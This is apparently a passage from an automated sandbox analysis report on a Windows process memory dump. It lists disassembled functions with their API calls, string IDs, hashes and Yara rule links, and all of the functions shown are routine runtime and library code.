                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Module$FileHandleName_abort
                                                                                                                                                        • String ID: )K7~$Microsoft Visual C++ Runtime Library
                                                                                                                                                        • API String ID: 1148873439-3868355263
                                                                                                                                                        • Opcode ID: ae080da626ec40d8cbe23799ae1a2ef98f2f74b54493d92f3dd08541941bed70
                                                                                                                                                        • Instruction ID: 7a7e4c98ca779f7c82ac5e2329269fecad35a24ec4b8822d102ef72a9f9015c2
                                                                                                                                                        • Opcode Fuzzy Hash: ae080da626ec40d8cbe23799ae1a2ef98f2f74b54493d92f3dd08541941bed70
                                                                                                                                                        • Instruction Fuzzy Hash: B00145B254021E7BCF10EEA4CD4AEAE77ADDB84B10F10845AF70497682D970FA028B58
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005CAFC0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: )K7~$)K7~
                                                                                                                                                        • API String ID: 0-1380908766
                                                                                                                                                        • Opcode ID: 68531a3bd30bf755513f6a80e19cfb382f8bf17962b9ea8fc6353477dcb63ea1
                                                                                                                                                        • Instruction ID: 1a4083d75f90eb8b430513617da3bb54921782b3bbc667255d5aee07c807c1f7
                                                                                                                                                        • Opcode Fuzzy Hash: 68531a3bd30bf755513f6a80e19cfb382f8bf17962b9ea8fc6353477dcb63ea1
                                                                                                                                                        • Instruction Fuzzy Hash: 0D118CB1900249EFDB01EFA8D806B9ABFB8FB54710F10466EF80597241EB75AA04C7A5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042534E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0042542B: __EH_prolog.LIBCMT ref: 00425430
                                                                                                                                                          • Part of subcall function 0042542B: RtlEnterCriticalSection.NTDLL(?), ref: 00425444
                                                                                                                                                          • Part of subcall function 0042542B: RtlLeaveCriticalSection.NTDLL(?), ref: 00425472
                                                                                                                                                          • Part of subcall function 0042542B: CloseHandle.KERNEL32(00000004), ref: 00425497
                                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(?), ref: 004253C2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$CloseDeleteEnterH_prologHandleLeave
                                                                                                                                                        • String ID: NSB$IA
                                                                                                                                                        • API String ID: 1975924688-1714093477
                                                                                                                                                        • Opcode ID: 2a4d33a94110931a7f58db9e7381a10ef2a5133b139236f25522b736e0e7fd8f
                                                                                                                                                        • Instruction ID: ad83f70afcdeb8132085fc4e580e013356fda8066906041df9edcfad394663b3
                                                                                                                                                        • Opcode Fuzzy Hash: 2a4d33a94110931a7f58db9e7381a10ef2a5133b139236f25522b736e0e7fd8f
                                                                                                                                                        • Instruction Fuzzy Hash: D2115970A44754FBE320EF94E806F8ABBE8EB04710F10465EF581A76C2DBF81604C798
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004A20E1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004A20E6
                                                                                                                                                          • Part of subcall function 004A65FB: __EH_prolog.LIBCMT ref: 004A6600
                                                                                                                                                          • Part of subcall function 004A653A: __EH_prolog.LIBCMT ref: 004A653F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: <L$R8J
                                                                                                                                                        • API String ID: 3519838083-315383820
                                                                                                                                                        • Opcode ID: c1dee0a14b4748abad44c297e92726812392bc50cca4f97a02d1f057999369b7
                                                                                                                                                        • Instruction ID: 73cc06e85bbee2e07c60c02e207811534bbedcdce0be2836b5243923bd4b0b8b
                                                                                                                                                        • Opcode Fuzzy Hash: c1dee0a14b4748abad44c297e92726812392bc50cca4f97a02d1f057999369b7
                                                                                                                                                        • Instruction Fuzzy Hash: 691115B1A1420AAFCB18DF6CD9059AAFBF9FF49300B10466FE014D7351E7B0AA008B94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0052A696, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0052A69B
                                                                                                                                                          • Part of subcall function 0051E245: __EH_prolog.LIBCMT ref: 0051E24A
                                                                                                                                                          • Part of subcall function 0051E077: __EH_prolog.LIBCMT ref: 0051E07C
                                                                                                                                                          • Part of subcall function 0051E2A2: __CxxThrowException@8.LIBVCRUNTIME ref: 0051E397
                                                                                                                                                        Strings
                                                                                                                                                        • Failed to allocate %lu bytes, xrefs: 0052A6CF
                                                                                                                                                        • cv::OutOfMemoryError, xrefs: 0052A6BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$Exception@8Throw
                                                                                                                                                        • String ID: Failed to allocate %lu bytes$cv::OutOfMemoryError
                                                                                                                                                        • API String ID: 1007369359-255125719
                                                                                                                                                        • Opcode ID: fed0f71012ed15a30a5eab3e64d35d165605fe29a58ae3fe82280f94a7b88c3c
                                                                                                                                                        • Instruction ID: bd45c75c13a506ddedde14e23246cd1d47ee49e4212610359232e599acb10d2f
                                                                                                                                                        • Opcode Fuzzy Hash: fed0f71012ed15a30a5eab3e64d35d165605fe29a58ae3fe82280f94a7b88c3c
                                                                                                                                                        • Instruction Fuzzy Hash: B201B572C01218AAEB18EBE8C81AFED7B7CAF55310F14425DF111A74C2EBB45B48C7A5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0051E39D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0051E3A2
                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0051E3B3
                                                                                                                                                          • Part of subcall function 0040F368: ___std_exception_copy.LIBVCRUNTIME ref: 0040F386
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog___std_exception_copystd::exception::exception
                                                                                                                                                        • String ID: UQ
                                                                                                                                                        • API String ID: 238416039-1003023986
                                                                                                                                                        • Opcode ID: 8d45d933a2094c6dbe8475efc1616c4152d2d494ced24e11a663b9c7b5bcd4c2
                                                                                                                                                        • Instruction ID: 1a7119e1c6a27d520ac01035e1235c2479b8747ccfe67e393bb2c2e6f8699c21
                                                                                                                                                        • Opcode Fuzzy Hash: 8d45d933a2094c6dbe8475efc1616c4152d2d494ced24e11a663b9c7b5bcd4c2
                                                                                                                                                        • Instruction Fuzzy Hash: 371170B1800648EBC715DFA9C554AEAFBF8FF18314F00866FE10193651DB74BA05CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A8E0A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 006A0BBE: GetLastError.KERNEL32(?,?,0068BA4F,0077A468,00000010), ref: 006A0BC2
                                                                                                                                                          • Part of subcall function 006A0BBE: _free.LIBCMT ref: 006A0BF5
                                                                                                                                                          • Part of subcall function 006A0BBE: SetLastError.KERNEL32(00000000), ref: 006A0C36
                                                                                                                                                          • Part of subcall function 006A0BBE: _abort.LIBCMT ref: 006A0C3C
                                                                                                                                                        • _abort.LIBCMT ref: 006A8E3C
                                                                                                                                                        • _free.LIBCMT ref: 006A8E70
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast_abort_free
                                                                                                                                                        • String ID: #x
                                                                                                                                                        • API String ID: 289325740-662376861
                                                                                                                                                        • Opcode ID: 7be9898498ab448607edfb75fb1a358dae4b1e08c6072b8478acb2b4d540de9b
                                                                                                                                                        • Instruction ID: 34b1e0d887b9fd9219e386972602fe84c0acd6ada3c36bca1a25ce1852ffdeaa
                                                                                                                                                        • Opcode Fuzzy Hash: 7be9898498ab448607edfb75fb1a358dae4b1e08c6072b8478acb2b4d540de9b
                                                                                                                                                        • Instruction Fuzzy Hash: A601C471D40621DFCB61BF28840125DF3A2BF05B11B25824DE95463792CB342D528FC9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041326E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: 89A$H9A
                                                                                                                                                        • API String ID: 3519838083-511708026
                                                                                                                                                        • Opcode ID: c168ce6a50e2bd7f468d07cc7223450e1b2b6964264329510ea78c9271fff4b2
                                                                                                                                                        • Instruction ID: ea665d1dfad8793eb2e8913838667f9b536d4809cdf04bc8bf3ae534165a2351
                                                                                                                                                        • Opcode Fuzzy Hash: c168ce6a50e2bd7f468d07cc7223450e1b2b6964264329510ea78c9271fff4b2
                                                                                                                                                        • Instruction Fuzzy Hash: F3117CB1901344AFCB24DF59C408A9ABBF5FF48324F10825EE0899B651D7B4DA45CF84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004133D3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: (9A$@9A
                                                                                                                                                        • API String ID: 3519838083-2001585676
                                                                                                                                                        • Opcode ID: 6aa6f121a1d695fcdca836fe4d220a024a0ad977975ac764071f5b4aeaf9eb79
                                                                                                                                                        • Instruction ID: d47adf42b0b7606d2d0f34f69079a8abe63bff88bfebb202fd3704411650e426
                                                                                                                                                        • Opcode Fuzzy Hash: 6aa6f121a1d695fcdca836fe4d220a024a0ad977975ac764071f5b4aeaf9eb79
                                                                                                                                                        • Instruction Fuzzy Hash: 961197B1A01344ABCB24CF59C408A9ABFF5FF48328F00825EE0899B651D7B1DA44CF84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004134F6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: 89A$H9A
                                                                                                                                                        • API String ID: 3519838083-511708026
                                                                                                                                                        • Opcode ID: ba2fbb5836d14f7eba1c3757845270304c9d14112b41ef0ed2eb053d7e9afb6f
                                                                                                                                                        • Instruction ID: 31fa910b9a499a39054fe65aace537cf043c855999afc4b739d099bc1f4eb3e0
                                                                                                                                                        • Opcode Fuzzy Hash: ba2fbb5836d14f7eba1c3757845270304c9d14112b41ef0ed2eb053d7e9afb6f
                                                                                                                                                        • Instruction Fuzzy Hash: 931179B1A01748EFCB24DF59C408A9ABBF5FF48328F10865EE0899B251D7B0DA45CF84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00413583, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: (9A$@9A
                                                                                                                                                        • API String ID: 3519838083-2001585676
                                                                                                                                                        • Opcode ID: 66a8b6e8c98be6b7817893fdd9e555bd3509fee2602904c08f73dd5fb1c46709
                                                                                                                                                        • Instruction ID: be5b62fb1456114bf07650fd7650c075b186e78b15e58ca54ed3e35cf0f35174
                                                                                                                                                        • Opcode Fuzzy Hash: 66a8b6e8c98be6b7817893fdd9e555bd3509fee2602904c08f73dd5fb1c46709
                                                                                                                                                        • Instruction Fuzzy Hash: 4C1157B1A01344EFCB24CF59C408A9ABBF6FF48328F10465EE0999B651D7B1DA44CB84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004152B4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 004152DB
                                                                                                                                                        • GetLastError.KERNEL32 ref: 004152E5
                                                                                                                                                          • Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                                                        • String ID: pqcs
                                                                                                                                                        • API String ID: 1288862127-2559862021
                                                                                                                                                        • Opcode ID: 064c07d6d307faf5420f5d9ae78d47ffd42d81725f203b2e952264f828ffdbab
                                                                                                                                                        • Instruction ID: 9e0eaae68fea76848ff6e78d8ba0fb33c82bcf1ffee4b9ae909bc97304c7d929
                                                                                                                                                        • Opcode Fuzzy Hash: 064c07d6d307faf5420f5d9ae78d47ffd42d81725f203b2e952264f828ffdbab
                                                                                                                                                        • Instruction Fuzzy Hash: 8F01D670E11128AF8B21AF6698449ABBBBDEF8075431040BBEC00CB211DB74CD428BE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C4A30, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410E2C: CloseHandle.KERNEL32(00000000,?,00410E24), ref: 00410E50
                                                                                                                                                        • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,?, )K7~,?,?,005C4A08,7E374B29, )K7~,?,?,?,?), ref: 005C4A75
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseHandleObjectSingleWait
                                                                                                                                                        • String ID: )K7~$)K7~
                                                                                                                                                        • API String ID: 528846559-412123606
                                                                                                                                                        • Opcode ID: b3bee061fcc1151c884ea54a7f0c423379d1f2b4913258a250f8a644601ae58f
                                                                                                                                                        • Instruction ID: fa90495ee3132bba4066a39990d4334a1eaa23b9f3609c7a50c1928917d99c20
                                                                                                                                                        • Opcode Fuzzy Hash: b3bee061fcc1151c884ea54a7f0c423379d1f2b4913258a250f8a644601ae58f
                                                                                                                                                        • Instruction Fuzzy Hash: EEF0C2326053125FCE10AAA1AC54F6FBBAEBFC0760F040A1EB94197241DB30EC008A94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004126B5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004126BA
                                                                                                                                                          • Part of subcall function 00412730: __EH_prolog.LIBCMT ref: 00412735
                                                                                                                                                          • Part of subcall function 00410F94: __EH_prolog.LIBCMT ref: 00410F99
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: h9A$u*A
                                                                                                                                                        • API String ID: 3519838083-1879692700
                                                                                                                                                        • Opcode ID: db52d1c5c2ae16a619431f1894027530a01a7933d8423c3cf4af9209c73fc0ed
                                                                                                                                                        • Instruction ID: 30fa7b6a3b7c53ff41c69dd53e005fc6ebd96bc375081e1702ab0f276cc7e161
                                                                                                                                                        • Opcode Fuzzy Hash: db52d1c5c2ae16a619431f1894027530a01a7933d8423c3cf4af9209c73fc0ed
                                                                                                                                                        • Instruction Fuzzy Hash: A0012FB2A02644EEC714DF18DA00AEABBF9FB85710F10867EE05587640DBF46A08CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041EFFA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: 0A
                                                                                                                                                        • API String ID: 3519838083-538879246
                                                                                                                                                        • Opcode ID: f4b35525397ce1c50f7ff550337af0e4fbd96fa7484d6b3c40bfd606653f8539
                                                                                                                                                        • Instruction ID: 5802c82f5fe659b7da1550a7db9f1a9f3b37c9e2d3429001af10d3bc13beece2
                                                                                                                                                        • Opcode Fuzzy Hash: f4b35525397ce1c50f7ff550337af0e4fbd96fa7484d6b3c40bfd606653f8539
                                                                                                                                                        • Instruction Fuzzy Hash: BE017CB1905346EED754DFA9854169EFFF4FF14310F20867EE09993641D7B05A00CB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00412C4E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: l4A
                                                                                                                                                        • API String ID: 3519838083-75327911
                                                                                                                                                        • Opcode ID: 1e804d4c31ff69ca688a837d2239034ed0578904f3d410898d77381d49f4311e
                                                                                                                                                        • Instruction ID: c5d238e506a2a8b2c9d407fa5e83167de6b9c73ac9b64205e1781a55565a0943
                                                                                                                                                        • Opcode Fuzzy Hash: 1e804d4c31ff69ca688a837d2239034ed0578904f3d410898d77381d49f4311e
                                                                                                                                                        • Instruction Fuzzy Hash: 5501B1B1941348DED720DF49D54179EFFB4FB50320F20866FE49997251D7B41A00CB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004ED0D9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004ED0DE
                                                                                                                                                          • Part of subcall function 0040F742: __EH_prolog.LIBCMT ref: 0040F747
                                                                                                                                                          • Part of subcall function 0040F742: GetProcessHeap.KERNEL32(00795A54,?,004ED106,?,00795A50,?,?,004ED4D5,?,?,00403520), ref: 0040F764
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$HeapProcess
                                                                                                                                                        • String ID: PZy$TZy
                                                                                                                                                        • API String ID: 2845616704-3389414821
                                                                                                                                                        • Opcode ID: 2d42c7fb179e39a4e4b72b4bec10c48d446e44e93ea0870386b2ec8b316677bf
                                                                                                                                                        • Instruction ID: ff70f01760cfc1976b7a8cdfabf0b5fb6bc723f4953a3b2b3ad08df5b155e9dd
                                                                                                                                                        • Opcode Fuzzy Hash: 2d42c7fb179e39a4e4b72b4bec10c48d446e44e93ea0870386b2ec8b316677bf
                                                                                                                                                        • Instruction Fuzzy Hash: 51017C71921A649AC716DF59AC8165EBFA4FF44320B00D32FA10997A60D7780A028B8D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00412F31, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: (9A$@9A
                                                                                                                                                        • API String ID: 3519838083-2001585676
                                                                                                                                                        • Opcode ID: 0c8922dd9310501aee7451642b2e26ad0c899acd641aabe76e7ad0d39991177d
                                                                                                                                                        • Instruction ID: a68009c1a1feec2bba006e04fca7164bbdc261624b1552e6f84e8125858bb381
                                                                                                                                                        • Opcode Fuzzy Hash: 0c8922dd9310501aee7451642b2e26ad0c899acd641aabe76e7ad0d39991177d
                                                                                                                                                        • Instruction Fuzzy Hash: 840165B1A11708DFC724CF59C548AAABBF1FB08328F00866EE0999B750D3B4DA048F94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041300C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: 89A$H9A
                                                                                                                                                        • API String ID: 3519838083-511708026
                                                                                                                                                        • Opcode ID: 159bc668f376c5f98e375d80a79d1708912a16b84cd3cfec886982fb48a42a8a
                                                                                                                                                        • Instruction ID: fec7219dc86b975970baf3b2fc9c19d62cc90f2772644c3ef16286538034ffd2
                                                                                                                                                        • Opcode Fuzzy Hash: 159bc668f376c5f98e375d80a79d1708912a16b84cd3cfec886982fb48a42a8a
                                                                                                                                                        • Instruction Fuzzy Hash: D90165B1A017089FCB24CF59C548BAABBF1FB08369F10825DE4899B341C3B4DA04CF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057A833, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057A83A
                                                                                                                                                        • Concurrency::critical_section::critical_section.LIBCONCRT ref: 0057A86F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
